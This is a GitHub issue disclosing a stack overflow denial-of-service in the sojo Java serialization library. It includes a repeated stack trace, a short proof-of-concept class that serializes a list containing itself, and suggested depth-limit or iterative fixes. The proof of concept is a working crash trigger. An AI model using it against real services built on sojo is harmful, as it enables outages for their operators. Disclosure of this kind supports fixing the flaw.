Skip to content

Stack overflow error caused by sojo serialization List #17

New issue
New issue
Open
Open
Stack overflow error caused by sojo serialization List#17
@PoppingSnack

Description

@PoppingSnack
PoppingSnack
opened on Jun 9, 2023

Stack overflow error caused by sojo serialization List

Description

sojo before v1.1.1 was discovered to contain a stack overflow via the List parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at net.sf.sojo.common.ObjectGraphWalker.fireVisitIterateableElement(ObjectGraphWalker.java:89)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:175)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)
	at net.sf.sojo.common.ObjectGraphWalker.iteratorWalker(ObjectGraphWalker.java:182)
	at net.sf.sojo.common.ObjectGraphWalker.walkInternal(ObjectGraphWalker.java:151)

PoC

        <dependency>
            <groupId>net.sf.sojo</groupId>
            <artifactId>sojo</artifactId>
            <version>1.1.1</version>
        </dependency>
import net.sf.sojo.interchange.json.JsonSerializer;

import java.util.ArrayList;

public class PoC3 {

    public static void main(String[] args) {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JsonSerializer jsonSerializer = new JsonSerializer();
        jsonSerializer.serialize(list);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))

References

  1. If the value in map is the map's self, the new new JSONObject(map) cause StackOverflowError which may lead to dos jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions